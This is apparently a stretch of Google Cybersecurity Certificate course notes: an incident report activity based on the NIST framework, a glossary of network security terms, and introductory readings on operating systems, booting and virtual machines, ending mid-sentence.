● Protect internal assets through the implementation of policies, procedures, training,
and tools that help mitigate cybersecurity threats.
● Detect potential security incidents and improve monitoring capabilities to increase
the speed and efficiency of detections.
● Respond to contain, neutralize, and analyze security incidents; implement
improvements to the security process.
● Recover affected systems to normal operation and restore systems, data, and/or
assets that have been affected by an incident.
Step-By-Step Instructions
Step 1: Access the incident report analysis template
To access the template for this course item, click the following link and select Use Template.
Link to template:
● Incident report analysis
Link to supporting materials:
● Applying the NIST CSF
● Example of an incident report analysis
Step 2: Identify the type of attack and the systems affected
Think about all of the concepts covered in the course so far and reflect on the scenario to
determine what type of attack occurred and which systems were affected. List this
information in the incident report analysis worksheet in the section titled “Identify.”
Step 3: Protect the assets in your organization from being compromised
Next, you will assess where the organization can improve to further protect its assets. In
this step, you will focus on creating an immediate action plan to respond to the
cybersecurity incident. When creating this plan, reflect on the following question:
● What systems or procedures need to be updated or changed to further secure the
organization’s assets?
Write your response in the incident report analysis template in the “Protect” section.
Step 4: Determine how to detect similar incidents in the future
It is important to continuously monitor network traffic on network devices to check for
suspicious activity, such as incoming external ICMP packets from non-trusted IP addresses
attempting to pass through the organization’s network firewall.
For this step, consider ways you and your team can monitor and analyze network traffic,
software applications, track authorized versus unauthorized users, and detect any unusual
activity on user accounts. Write your response in the incident response analysis worksheet
in the “Detect” section.
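One way to model the detection described above, flagging external ICMP traffic from non-trusted sources, is sketched below. The trusted network range, packet schema, and field names are assumptions for illustration only.

```python
import ipaddress

# Hypothetical trusted internal range; a real deployment would list its own networks.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

def suspicious_icmp(packets):
    """Return source IPs of ICMP packets that come from outside trusted networks."""
    flagged = []
    for pkt in packets:
        if pkt["protocol"] != "icmp":
            continue
        src = ipaddress.ip_address(pkt["src_ip"])
        if not any(src in net for net in TRUSTED_NETS):
            flagged.append(pkt["src_ip"])
    return flagged

# Simplified packet records for illustration:
packets = [
    {"src_ip": "10.1.2.3", "protocol": "icmp"},       # internal, trusted
    {"src_ip": "198.51.100.7", "protocol": "icmp"},   # external ICMP -> flag
    {"src_ip": "198.51.100.8", "protocol": "tcp"},    # not ICMP, ignored
]
print(suspicious_icmp(packets))  # ['198.51.100.7']
```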
Step 5: Create a response plan for future cybersecurity incidents
After identifying the tools and methods you and your organization have in place for
detecting potential vulnerabilities and threats, create a response plan in the event of a
future incident. This typically happens after the incident occurred and has been resolved by
you and your team. In this case, you will create a response plan for future cybersecurity
incidents. Some items to consider when creating a response plan to any cybersecurity
incident:
● How can you and your team contain cybersecurity incidents and affected devices?
● What procedures are in place to help you and your team neutralize cybersecurity
incidents?
● What data or information can be used to analyze this incident?
● How can your organization’s recovery process be improved to better handle future
cybersecurity incidents?
Write your response in the incident report analysis template under the “Respond” section.
Step 6: Help your organization recover from the incident
Consider what steps need to be taken to help the organization recover from the
cybersecurity incident. Reflect on all the information you gathered about the incident in the
previous steps to consider which devices, systems, and processes need to be restored and
recovered.
Consider the following questions:
● What information do you need to be able to recover immediately?
● What processes are in place to help the organization recover from the incident?
Write your response in the “Recover” portion of the worksheet.
What to Include in Your Response
Later, you will have the opportunity to assess your performance using the criteria listed. Be
sure to address the following in your completed activity.
Course 3 incident report analysis
● Identifies the type of attack and the systems impacted by the incident
● Offers a protection plan against future cybersecurity incidents
● Describes detection methods that can be used to identify potential cybersecurity
incidents
● Includes a response plan for the cybersecurity incident and an outline for future
cybersecurity incidents
● Outlines recovery plans you and the organization can implement in future
cybersecurity incidents.
Assessment of Exemplar
Compare the exemplar to your completed incident report analysis and incident report.
Review your work using each of the criteria in the exemplar. What did you do well? Where
can you improve? Use your answers to these questions to guide you as you continue to
progress through the program.
Note: The exemplar represents one example of how to complete the activity. Yours may
differ in certain ways. What’s important is that you have an idea of what your incident
analysis should resemble.
The exemplar is accompanied by the activity, and presents a complete incident report
analysis to establish:
● What type of attack occurred, the scope of the incident, and its impact to the
organization
● Potential network vulnerabilities and protection measures
● Detection tools to monitor and secure the network
● How to respond to cybersecurity incidents in the future
● Recovery plans to restore normal operations
Wow, we have covered a lot in this course! Let's review everything we've discussed. You learned
about networks, network architecture, and the best practices used by security professionals to
secure a network against security breaches. As we bring this course to a close, let's review what
you've learned about security networks so far. First, we explored
the structure of a network. A security analyst must understand how a network is designed to be
able to identify parts of a network that present vulnerabilities and need to be secured. Next, we
learned about network operations and how they affect the communication of data. Network
protocols determine how the data is transmitted over the network. As communication takes place
over the network, malicious actors may use tactics such as denial of service attacks,
packet sniffing, and IP spoofing. Security analysts employ tools and measures such as firewall rules
to protect against these attacks. We also discussed security hardening. Security hardening is used to
reduce the attack surface of a network, which limits how much of the network an attack can disable.
Security hardening can be done at the hardware level, the software level, or the network level.
Securing networks is an essential part of a security analyst's duties. Knowledge of a network and its
operations and security practices will ensure that you are successful in your career as a security
analyst. And that brings us to the topic of our next course, which will cover computing basics for
security analysts. In that course, you'll learn how to use the Linux command line to authenticate
and authorize users on the network, and to use SQL, or Structured Query Language, to communicate
with databases.
Glossary
Cybersecurity
Terms and definitions from Course 3
A
Active packet sniffing: A type of attack where data packets are manipulated in transit
Address Resolution Protocol (ARP): Used to determine the MAC address of the next router
or device to traverse
B
Bandwidth: The maximum data transmission capacity over a network, measured by bits
per second
Baseline configuration: A documented set of specifications within a system that is used as a
basis for future builds, releases, and updates
Bluetooth: Used for wireless communication with nearby physical devices
Botnet: A collection of computers infected by malware that are under the control of a single
threat actor, known as the “bot herder”
C
Cloud-based firewalls: Software firewalls that are hosted by the cloud service provider
Cloud computing: The practice of using remote servers, application, and network services
that are hosted on the internet instead of on local physical devices
Cloud network: A collection of servers or computers that stores resources and data in
remote data centers that can be accessed via the internet
Controlled zone: A subnet that protects the internal network from the uncontrolled zone
D
Data packet: A basic unit of information that travels from one device to another within a
network
Denial of service (DoS) attack: An attack that targets a network or server and floods it with
network traffic
Distributed denial of service (DDoS) attack: A type of denial of service attack that uses
multiple devices or servers located in different locations to flood the target network with
unwanted traffic
Domain Name System (DNS): A networking protocol that translates internet domain names
into IP addresses
E
Encapsulation: A process performed by a VPN service that protects your data by wrapping
sensitive data in other data packets
F
File Transfer Protocol (FTP): Used to transfer files from one device to another over a
network
Firewall: A network security device that monitors traffic to or from your network
Forward proxy server: A server that regulates and restricts a person’s access to the internet
H
Hardware: The physical components of a computer
Hub: A network device that broadcasts information to every device on the network
Hypertext Transfer Protocol (HTTP): An application layer protocol that provides a method
of communication between clients and website servers
Hypertext Transfer Protocol Secure (HTTPS): A network protocol that provides a secure
method of communication between clients and servers
I
Identity and access management (IAM): A collection of processes and technologies that
helps organizations manage digital identities in their environment
IEEE 802.11 (Wi-Fi): A set of standards that define communication for wireless LANs
Internet Control Message Protocol (ICMP): An internet protocol used by devices to tell each
other about data transmission errors across the network
Internet Control Message Protocol (ICMP) flood: A type of DoS attack performed by an
attacker repeatedly sending ICMP request packets to a network server
Internet Protocol (IP): A set of standards used for routing and addressing data packets as
they travel between devices on a network
Internet Protocol (IP) address: A unique string of characters that identifies the location of a
device on the internet
IP spoofing: A network attack performed when an attacker changes the source IP of a data
packet to impersonate an authorized system and gain access to a network
L
Local area network (LAN): A network that spans small areas like an office building, a school,
or a home
M
Media Access Control (MAC) address: A unique alphanumeric identifier that is assigned to
each physical device on a network
Modem: A device that connects your router to the internet and brings internet access to the
LAN
Multi-factor authentication (MFA): A security measure that requires a user to verify their
identity in two or more ways to access a system or network
N
Network: A group of connected devices
Network log analysis: The process of examining network logs to identify events of interest
Network protocols: A set of rules used by two or more devices on a network to describe the
order of delivery of data and the structure of data
Network segmentation: A security technique that divides the network into segments
O
On-path attack: An attack where a malicious actor places themselves in the middle of an
authorized connection and intercepts or alters the data in transit
Open Systems Interconnection (OSI) model: A standardized concept that describes the
seven layers computers use to communicate and send data over the network
Operating system (OS): The interface between computer hardware and the user
P
Packet sniffing: The practice of capturing and inspecting data packets across a network
Passive packet sniffing: A type of attack where a malicious actor connects to a network hub
and looks at all traffic on the network
Patch update: A software and operating system update that addresses security
vulnerabilities within a program or product
Penetration testing: A simulated attack that helps identify vulnerabilities in systems,
networks, websites, applications, and processes
Ping of death: A type of DoS attack caused when a hacker pings a system by sending it an
oversized ICMP packet that is bigger than 64KB
Port: A software-based location that organizes the sending and receiving of data between
devices on a network
Port filtering: A firewall function that blocks or allows certain port numbers to limit
unwanted communication
Proxy server: A server that fulfills the requests of its clients by forwarding them to other
servers
R
Replay attack: A network attack performed when a malicious actor intercepts a data packet
in transit and delays it or repeats it at another time
Reverse proxy server: A server that regulates and restricts the Internet's access to an
internal server
Router: A network device that connects multiple networks together
S
Secure File Transfer Protocol (SFTP): A secure protocol used to transfer files from one
device to another over a network
Secure shell (SSH): A security protocol used to create a shell with a remote system
Security hardening: The process of strengthening a system to reduce its vulnerabilities and
attack surface
Security information and event management (SIEM): An application that collects and
analyzes log data to monitor critical activities for an organization
Security zone: A segment of a company’s network that protects the internal network from
the internet
Simple Network Management Protocol (SNMP): A network protocol used for monitoring
and managing devices on a network
Smurf attack: A network attack performed when an attacker sniffs an authorized user’s IP
address and floods it with ICMP packets
Speed: The rate at which a device sends and receives data, measured by bits per second
Stateful: A class of firewall that keeps track of information passing through it and
proactively filters out threats
Stateless: A class of firewall that operates based on predefined rules and that does not keep
track of information from data packets
Subnetting: The subdivision of a network into logical groups called subnets
Switch: A device that makes connections between specific devices on a network by sending
and receiving data between them
Synchronize (SYN) flood attack: A type of DoS attack that simulates a TCP/IP connection
and floods a server with SYN packets
T
TCP/IP model: A framework used to visualize how data is organized and transmitted across
a network
Transmission Control Protocol (TCP): An internet communication protocol that allows two
devices to form a connection and stream data
Transmission control protocol (TCP) 3-way handshake: A three-step process used to
establish an authenticated connection between two devices on a network
U
Uncontrolled zone: The portion of the network outside the organization
User Datagram Protocol (UDP): A connectionless protocol that does not establish a
connection between devices before transmissions
V
Virtual Private Network (VPN): A network security service that changes your public IP
address and masks your virtual location so that you can keep your data private when you
are using a public network like the internet
W
Wide Area Network (WAN): A network that spans a large geographic area like a city, state,
or country
Wi-Fi Protected Access (WPA): A wireless security protocol for devices to connect to the
internet
Get started on the next course
Congratulations on completing Course 3 of the Google Cybersecurity Certificate: Connect and Protect:
Networks and Network Security! In this part of the program, you learned about the structure of networks
and how to identify network vulnerabilities. You also explored network operations and how they affect
the communication of data. Next, you discovered some common types of network attacks, their
consequences on an organization, and ways to protect networks against attacks. Lastly, you learned how
to reduce the attack surface of a network by applying various protective measures on a network.
The Google Cybersecurity Certificate has eight courses:
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks. (This is the course you just completed. Well done!)
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Now that you have completed this course, you’re ready to move on to the next course: Tools of the
Trade: Linux and SQL.
Course 4 Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying databases
with SQL.
Hi! Welcome to this course on computing basics for security. My name is Kim, and I work as a
Technical Program Manager in security. I grew up with computers and the internet but didn't really
consider security as a career opportunity until I saw how it was interwoven into technology. Before
my first security job, I worked on a cloud application team and had to regularly interact with the
security team. It was my first experience working with security, but the idea of protecting
information and working with others towards that goal was exciting to me. As a result, I decided to
work towards my CISSP, which led me to some new job opportunities at my company, and I was
then able to move into security. At this point, if you've been following along, you've already
explored a variety of concepts useful to the security field, including security domains and
networking. I'm excited to join you during the next part of the program. We'll take it slow so that
you can understand these topics in practical ways. The focus of this course is computing basics.
When you understand how the machines in an organization's system work, it helps you do your job
as a security analyst more efficiently. Part of your job as a
security analyst is to keep systems protected from possible attacks. You're one of the first levels of
defense in protecting an organization's data. To do this effectively, it's helpful to understand how
the system you're protecting works. In addition, you may need to investigate events to help correct
errors in the system. Being familiar with the Linux operating system and its associated commands, and
also being able to interact with an organization's data through SQL, will help you with that. In this
course you'll learn about operating systems and how they relate to applications and hardware.
Next, you'll explore the Linux operating system in more detail. Then you'll use the Linux command
line within a security context. Finally, we'll discuss how you can use SQL to query databases while
working as a security analyst. I'm excited to explore all of these topics with you.
Course 4 overview
Hello, and welcome to Tools of the Trade: Linux and SQL, the fourth course in the Google Cybersecurity
Certificate. You're on an exciting journey!
By the end of this course, you will develop a greater understanding of the basics of computing that will
support your work as a security analyst. You will learn foundational concepts related to understanding
operating systems, communicating with the Linux operating system through commands, and querying
databases with Structured Query Language (SQL). These are key concepts in the cybersecurity field and
understanding them will help you keep organizations secure.
Certificate program progress
The Google Cybersecurity Certificate program has eight courses. Tools of the Trade: Linux and SQL is the
fourth course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — (current course) Explore foundational computing skills,
including communicating with the Linux operating system through the command line and
querying databases with SQL.
Course 4 content
Each course of this certificate program is broken into modules. You can complete courses at your own
pace, but the module breakdowns are designed to help you finish the entire Google Cybersecurity
Certificate in about six months.
Module 1: Introduction to operating systems
You will learn about the relationship between operating systems, hardware, and software, and become
familiar with the primary functions of an operating system. You'll recognize common operating systems
in use today and understand how the graphical user interface (GUI) and command-line interface (CLI)
both allow users to interact with the operating system.
Module 2: The Linux operating system
You will be introduced to the Linux operating system and learn how it is commonly used in
cybersecurity. You’ll also learn about Linux architecture and common Linux distributions. In addition,
you'll be introduced to the Linux shell and learn how it allows you to communicate with the operating
system.
Module 3: Linux commands in the Bash shell
You will be introduced to Linux commands as entered through the Bash shell. You'll use the Bash shell to
navigate and manage the file system and to authorize and authenticate users. You'll also learn where to
go for help when working with new Linux commands.
Module 4: Databases and SQL
You will practice using SQL to communicate with databases. You'll learn how to query a database and
filter the results. You’ll also learn how SQL can join multiple tables together in a query.
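As a small preview of the kind of query Module 4 covers, the sketch below uses Python's built-in sqlite3 module to join two tables. The table names, column names, and sample data are invented for illustration; the course uses its own example database.

```python
# A hypothetical two-table join, sketched with Python's built-in sqlite3
# module. The employees and logins tables here are made up for illustration.
import sqlite3

conn = sqlite3.connect(":memory:")  # temporary in-memory database
cur = conn.cursor()
cur.execute("CREATE TABLE employees (id INTEGER, name TEXT)")
cur.execute("CREATE TABLE logins (employee_id INTEGER, login_time TEXT)")
cur.execute("INSERT INTO employees VALUES (1, 'asantos'), (2, 'bmoreno')")
cur.execute("INSERT INTO logins VALUES (1, '2023-11-01 09:02'), (1, '2023-11-01 17:45')")

# Join the two tables so each login record is shown with the employee's name.
cur.execute("""
    SELECT e.name, l.login_time
    FROM employees AS e
    JOIN logins AS l ON e.id = l.employee_id
""")
for name, login_time in cur.fetchall():
    print(name, login_time)
```

A query like this is useful in security work when one table holds user accounts and another holds activity logs: the join connects each logged event back to a person.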
Module 1: Introduction to operating systems
You will learn about the relationship between operating systems, hardware, and software, and become
familiar with the primary functions of an operating system. You'll recognize common operating systems
in use today and understand how the graphical user interface (GUI) and command-line interface (CLI)
both allow users to interact with the operating system.
Devices like computers, smartphones, and tablets all have operating systems. If you've used a desktop or
laptop computer, you may have used the Windows or macOS operating systems. Smartphones and
tablets run on mobile operating systems like Android and iOS. Another popular operating system is
Linux. Linux is used in the security industry, and as a security professional, it's likely that you'll interact
with the Linux OS. So what exactly is an operating system? It's the interface between the computer
hardware and the user. The operating system, or the OS as it's
commonly called, is responsible for making the computer run as efficiently as possible while also making
it easy to use. Hardware may be another new term. Hardware refers to the physical components of a
computer. The OS interface that we now rely on every day is something that early computers didn't
have. In the 1950s the biggest challenge with early computers was the amount of time it took to run a
computer program. At the time, computers could not run multiple programs simultaneously. Instead,
people had to wait for a program to finish running, reset the computer, and load up the new program.
Imagine having to turn your computer on and off each time you had to open a new application! It would
take a long time to complete a simple task like sending an email. Since then, operating systems have
evolved, and we no longer have to worry about wasting time in this way. Thanks to operating systems
and their evolution, today's computers run efficiently. They run multiple applications at once, and they
also access external devices like printers, keyboards, and mice. Another reason why operating systems
are important is that they help humans and computers communicate with each other. Computers
communicate in a language called binary, which consists of 0s and 1s. The OS provides an interface to
bridge this communication gap between the user and the computer, allowing you to interact with the
computer in complex ways. Operating systems are critical for the use of computers. Likewise, OS
security is also critical to the security of a computer as a whole. This involves securing files, data access, and user
authentication to help protect against threats such as viruses, worms, and malware.
Knowing how operating systems work is essential for completing different security related tasks. For
example, as a security analyst, you may be responsible for configuring and maintaining the security of a
system by managing access. You may also be responsible for managing and configuring firewalls, setting
security policies, enabling virus protection, and performing auditing, accounting, and logging to detect
unusual behavior.
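To make the idea of binary concrete, here is a small Python sketch (not part of the course materials) showing how ordinary text maps to the 0s and 1s a computer actually works with:

```python
# A minimal illustration of the binary "language" computers use: every
# character a user types is ultimately stored and transmitted as a pattern
# of 0s and 1s. The OS and applications hide this translation from the user.

def to_binary(text):
    """Return the 8-bit binary string for each character in the text."""
    return [format(ord(char), "08b") for char in text]

bits = to_binary("Hi")
print(bits)  # ['01001000', '01101001'] -- 'H' is code 72, 'i' is code 105
```

This is exactly the communication gap the reading describes: you type "Hi," and layers of software translate it down to bit patterns and back so you never have to.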
Compare operating systems
You previously explored why operating systems are an important part of how a computer works. In this
reading, you’ll compare some popular operating systems used today. You’ll also focus on the risks of
using legacy operating systems.
Common operating systems
The following operating systems are useful to know in the security industry: Windows, macOS®, Linux,
ChromeOS, Android, and iOS.
Windows and macOS
Windows and macOS are both common operating systems. The Windows operating system was
introduced in 1985, and macOS was introduced in 1984. Both operating systems are used in personal
and enterprise computers.
Windows is a closed-source operating system, which means the source code is not shared freely with the
public. macOS is partially open source. It has some open-source components, such as macOS’s kernel.
macOS also has some closed-source components.
Linux
The first version of Linux was released in 1991, and other major releases followed in the early 1990s.
Linux is a completely open-source operating system, which means that anyone can access Linux and its
source code. The open-source nature of Linux allows developers in the Linux community to collaborate.
Linux is particularly important to the security industry. There are some distributions that are
specifically designed for security. Later in this course, you’ll learn about Linux and its importance to the
security industry.
ChromeOS
ChromeOS launched in 2011. It’s partially open source and is derived from Chromium OS, which is
completely open source. ChromeOS is frequently used in the education field.
Android and iOS
Android and iOS are both mobile operating systems. Unlike the other operating systems mentioned,
mobile operating systems are typically used in mobile devices, such as phones, tablets, and watches.
Android was introduced for public use in 2008, and iOS was introduced in 2007. Android is open source,
and iOS is partially open source.
Operating systems and vulnerabilities
Security issues are inevitable with all operating systems. An important part of protecting an operating
system is keeping the system and all of its components up to date.
Legacy operating systems
A legacy operating system is an operating system that is outdated but still being used. Some
organizations continue to use legacy operating systems because software they rely on is not compatible
with newer operating systems. This can be more common in industries that use a lot of equipment that
requires embedded software—software that’s placed inside components of the equipment.
Legacy operating systems can be vulnerable to security issues because they’re no longer supported or
updated. This means that legacy operating systems might be vulnerable to new threats.
Other vulnerabilities
Even when operating systems are kept up to date, they can still become vulnerable to attack. Below are
several resources that include information on operating systems and their vulnerabilities.
● Microsoft Security Response Center (MSRC): A list of known vulnerabilities affecting Microsoft products and services
● Apple Security Updates: A list of security updates and information for Apple® operating systems, including macOS and iOS, and other products
● Common Vulnerabilities and Exposures (CVE) Report for Ubuntu: A list of known vulnerabilities affecting Ubuntu, which is a specific distribution of Linux
● Google Cloud Security Bulletin: A list of known vulnerabilities affecting Google Cloud products and services
Keeping an operating system up to date is one key way to help the system stay secure. Because it can be
difficult to keep all systems updated at all times, it’s important for security analysts to be knowledgeable
about legacy operating systems and the risks they can create.
Key takeaways
Windows, macOS, Linux, ChromeOS, Android, and iOS are all commonly used operating systems.
Security analysts should be aware of vulnerabilities that affect operating systems. It’s especially
important for security analysts to be familiar with legacy operating systems, which are systems that are
outdated but still being used.
Inside the operating system
Previously, you learned about what operating systems are. Now, let's discuss how they work. In this
video, you'll learn what happens with an operating system, or OS, when someone uses a computer for a
task. Think about when someone drives a car. They push the gas pedal and the car moves forward. They
don't need to pay attention to all the mechanics that allow the car to move. Just like a car can't work
without its engine, a computer can't work without its operating system. The job of an OS is to help other
computer programs run efficiently. The OS does this by taking care of all the messy details related to
controlling the computer's hardware, so you don't have to. First, let's see what happens when you turn
on the computer. When you press the power button, you're interacting with the hardware. This boots
the computer and brings up the operating system. Booting the computer means that a special microchip
called the BIOS is activated. On many computers built after 2007, this chip has been replaced by UEFI. Both
BIOS and UEFI contain booting instructions that are responsible for loading a special program called the
bootloader. Then, the bootloader is responsible for starting the operating system. Just like that, your
computer is on. As a security analyst, understanding these processes can be helpful for you.
Vulnerabilities can occur in something like a booting process. Often, the BIOS is not scanned by the
antivirus software, so it can be vulnerable to malware infection. Now that you've learned how the
operating system boots, let's look at how you and all users communicate with the system to complete a task.
The process starts
with you, the user. And to complete tasks, you use applications on your computer. An application is a
program that performs a specific task. When you do this, the application sends your request to
the operating system. From there, the operating system interprets this request and directs it to the
appropriate component of the computer's hardware. In the previous video, we learned that the
hardware consists of all the physical components of the computer. The hardware will also send
information back to the operating system. And this in turn is sent back to the application. Let's give a
simple overview of how this works when you want to use the calculator on your computer. You use your
mouse to click on the calculator application on your computer. When you type in the number you want
to calculate, the application communicates with the operating system. Your operating system then sends
a calculation to a component of the hardware, the central processing unit, or CPU. Once the hardware
does the work of determining the final number, it sends the answer back to your operating system.
Then, it can be displayed in your calculator application. Understanding this process is helpful when
investigating security events. Security analysts should be able to trace back through this process flow to
analyze where a security event could have occurred. Just like a mechanic needs to understand the inner
workings of a car more than an average driver, recognizing how operating systems work is important
knowledge for a security analyst.
Requests to the operating system
Operating systems are a critical component of a computer. They make connections between applications
and hardware to allow users to perform tasks. In this reading, you’ll explore this complex process
further and consider it using a new analogy and a new example.
Booting the computer
When you boot, or turn on, your computer, either a BIOS or UEFI microchip is activated. The Basic
Input/Output System (BIOS) is a microchip that contains loading instructions for the computer and is
prevalent in older systems. The Unified Extensible Firmware Interface (UEFI) is a microchip that
contains loading instructions for the computer and replaces BIOS on more modern systems.
The BIOS and UEFI chips both perform the same function for booting the computer. BIOS was the
standard chip until 2007, when UEFI chips increased in use. Now, most new computers include a UEFI
chip. UEFI provides enhanced security features.
The BIOS or UEFI microchips contain a variety of loading instructions for the computer to follow. For
example, one of the loading instructions is to verify the health of the computer’s hardware.
The last instruction from the BIOS or UEFI activates the bootloader. The bootloader is a software
program that boots the operating system. Once the operating system has finished booting, your
computer is ready for use.
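The boot sequence above is a fixed, ordered chain of hand-offs. The following Python sketch models it as a simple list of stages; the labels are just descriptive strings for illustration, since real firmware is low-level code, not Python.

```python
# A simplified model of the boot sequence: firmware (BIOS or UEFI) runs
# first, checks the hardware, hands off to the bootloader, and the
# bootloader starts the operating system. Stage names are illustrative.

def boot_sequence(firmware="UEFI"):
    """Return the ordered stages of booting a computer."""
    return [
        f"{firmware} chip activated on power-on",
        f"{firmware} verifies the health of the computer's hardware",
        f"{firmware} activates the bootloader",
        "Bootloader starts the operating system",
        "Operating system finishes booting; computer ready for use",
    ]

for stage in boot_sequence():
    print(stage)
```

Keeping the order straight matters for security work: malware that inserts itself before the bootloader runs is loaded before most defenses, which is why the reading flags the boot process as a potential vulnerability.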
Completing a task
As previously discussed, operating systems help us use computers more efficiently. Once a computer has
gone through the booting process, completing a task on a computer is a four-part process.
User
The first part of the process is the user. The user initiates the process by having something they want to
accomplish on the computer. Right now, you’re a user! You’ve initiated the process of accessing this
reading.
Application
The application is the software program that users interact with to complete a task. For example, if you
want to calculate something, you would use the calculator application. If you want to write a report, you
would use a word processing application. This is the second part of the process.
Operating system
The operating system receives the user’s request from the application. It’s the operating system’s job to
interpret the request and direct its flow. In order to complete the task, the operating system sends it on
to applicable components of the hardware.
Hardware
The hardware is where all the processing is done to complete the tasks initiated by the user. For
example, when a user wants to calculate a number, the CPU figures out the answer. As another example,
when a user wants to save a file, another component of the hardware, the hard drive, handles this task.
After the work is done by the hardware, it sends the output back through the operating system to the
application so that it can display the results to the user.
The OS at work behind the scenes
Consider once again how a computer is similar to a car. There are processes that someone won’t directly
observe when operating a car, but they do feel it move forward when they press the gas pedal. It’s the
same with a computer. Important work happens inside a computer that you don’t experience directly.
This work involves the operating system.
You can explore this through another analogy. The process of using an operating system is also similar
to ordering at a restaurant. At a restaurant you place an order and get your food, but you don’t see
what’s happening in the kitchen when the cooks prepare the food.
Ordering food is similar to using an application on a computer. When you order your food, you make a
specific request like “a small soup, very hot.” When you use an application, you also make specific
requests like “print three double-sided copies of this document.”
You can compare the food you receive to what happens when the hardware sends output. You receive
the food that you ordered. You receive the document that you wanted to print.
Finally, the kitchen is like the OS. You don’t know what happens in the kitchen, but it’s critical in
interpreting the request and ensuring you receive what you ordered. Similarly, though the work of the
OS is not directly visible to you, it's critical in completing your tasks.
An example: Downloading a file from an internet browser
Previously, you explored how operating systems, applications, and hardware work together
by examining a task involving a calculation. You can expand this understanding by exploring how the OS
completes another task, downloading a file from an internet browser:
● First, the user decides they want to download a file that they found online, so they click on a download button near the file in the internet browser application.
● Then, the internet browser communicates this action to the OS.
● The OS sends the request to download the file to the appropriate hardware for processing.
● The hardware begins downloading the file, and the OS sends this information to the internet browser application. The internet browser then informs the user when the file has been downloaded.
Key takeaways
Although it operates in the background, the operating system is an essential part of the process of using
a computer. The operating system connects applications and hardware to allow users to complete a task.
Now we're ready to discuss a different aspect of your operating system. Not only does the OS interact
with other parts of your computer, but it's also responsible for managing the resources
of the system. This is a big task that requires a lot of balance to make sure all the resources of the
computer are used efficiently. Think of this like the concept of energy. A person needs energy to
complete different tasks. Some tasks need more energy, while others require less. For example, going for
a run requires more energy than watching TV. A computer's OS also needs to make sure that it has
enough energy to function correctly for certain tasks. Running an antivirus scan on your computer will
use more energy than using the calculator application. Imagine your computer is an orchestra. Many
different instruments like violins, drums, and trumpets are all part of the orchestra. An orchestra also
has a conductor to direct the flow of the music. In a computer, the OS is the conductor. The OS handles
resource and memory management to ensure the limited capacity of the computer system is used where
it's needed most. A variety of programs, tasks, and processes are constantly competing for the resources
of the central processing unit, or CPU. They all have their own reasons why they need memory, storage,
and input/output bandwidth. The OS is responsible
for allocating and de-allocating resources for each program. All this occurs in
your computer at the same time so that your system functions efficiently. Much of this is hidden
from you as a user. But your task manager will list all of the tasks that are being processed, along with
their memory and CPU usage. As an analyst, it's helpful to know where a system's resources are used.
Understanding usage of resources can help you respond to an incident and troubleshoot applications in
the system. For example, if a computer is running slowly, an analyst might discover it's allocating
resources to malware. A basic understanding of how operating systems work will help you better
understand the security skills you will learn later in this program.
Virtualization technology
You've explored a lot about operating systems. One more aspect to consider is that operating systems
can run on virtual machines. In this reading, you’ll learn about virtual machines and the general concept
of virtualization. You’ll explore how virtual machines work and the benefits of using them.
What is a virtual machine?
A virtual machine (VM) is a virtual version of a physical computer. Virtual machines are one example of
virtualization. Virtualization is the process of using software to create virtual representations of various
physical machines. The term “virtual” refers to machines that don’t exist physically, but operate like they
do because their software simulates physical hardware. Virtual systems don’t use dedicated physical
hardware. Instead, they use software-defined versions of the physical hardware. This means that a
single virtual machine has a virtual CPU, virtual storage, and other virtual hardware. Virtual systems are
just code.
You can run multiple virtual machines using the physical hardware of a single computer. This involves
dividing the resources of the host computer to be shared across all physical and virtual components. For
example, Random Access Memory (RAM) is a hardware component used for short-term memory. If a
computer has 16GB of RAM, it can host three virtual machines so that the physical computer and virtual
machines each have 4GB of RAM. Also, each of these virtual machines would have their own operating
system and function similarly to a typical computer.
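The RAM split described above can be sketched with simple shell arithmetic. The 16GB figure and the three-guest setup are the reading's example, not a requirement of virtualization:

```shell
# Sketch of the example above: 16 GB of RAM shared equally by the
# physical host and three guest virtual machines.
total_ram_gb=16
machines=4                              # 1 host + 3 virtual machines
per_machine_gb=$((total_ram_gb / machines))
echo "Each machine gets ${per_machine_gb} GB of RAM"
```

In practice, hypervisors let you assign different amounts of RAM to each guest; an even split is just the simplest case.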
Benefits of virtual machines
Security professionals commonly use virtualization and virtual machines. Virtualization can increase
security for many tasks and can also increase efficiency.
Security
One benefit is that virtualization can provide an isolated environment, or a sandbox, on the physical host
machine. When a computer has multiple virtual machines, these virtual machines are “guests” of the
computer. Specifically, they are isolated from the host computer and other guest virtual machines. This
provides a layer of security, because virtual machines can be kept separate from the other systems. For
example, if an individual virtual machine becomes infected with malware, it can be dealt with more
securely because it’s isolated from the other machines. A security professional could also intentionally
place malware on a virtual machine to examine it in a more secure environment.
Note: Although using virtual machines is useful when investigating potentially infected machines or
running malware in a constrained environment, there are still some risks. For example, a malicious
program can escape virtualization and access the host machine. This is why you should never
completely trust virtualized systems.
Efficiency
Using virtual machines can also be an efficient and convenient way to perform security tasks. You can
open multiple virtual machines at once and switch easily between them. This allows you to streamline
security tasks, such as testing and exploring various applications.
You can compare the efficiency of a virtual machine to a city bus. A single city bus has a lot of room and
is an efficient way to transport many people simultaneously. If city buses didn’t exist, then everyone on
